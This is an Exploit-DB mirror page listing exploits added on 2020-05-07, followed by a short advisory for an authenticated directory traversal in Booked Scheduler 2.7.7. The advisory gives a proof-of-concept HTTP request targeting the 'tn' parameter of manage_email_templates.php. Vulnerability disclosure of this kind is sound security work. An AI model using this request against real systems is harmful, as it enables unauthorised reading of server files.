exploit-db-mirror/exploits/php/webapps/48428.txt
Offensive Security 81205fc37a DB: 2020-05-07
8 changes to exploits/shellcodes

Online Clothing Store 1.0 - Persistent Cross-Site Scripting
i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
Booked Scheduler 2.7.7 - Authenticated Directory Traversal
Online Clothing Store 1.0 - 'username' SQL Injection
webTareas 2.0.p8 - Arbitrary File Deletion
GitLab 12.9.0 - Arbitrary File Read
YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
MPC Sharj 3.11.1 - Arbitrary File Download
2020-05-07 05:01:48 +00:00

32 lines
No EOL
974 B
Text

# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
# Date: 2020-05-03
# Author: Besim ALTINOK
# Vendor Homepage: https://www.bookedscheduler.com
# Software Link: https://sourceforge.net/projects/phpscheduleit/
# Version: v2.7.7
# Tested on: Xampp
# Credit: İsmail BOZKURT
Description:
----------------------------------------------------------
Vulnerable Parameter: $tn
Vulnerable File: manage_email_templates.php
PoC
-----------
GET
/booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/booked/Web/admin/manage_email_templates.php
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441;
PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec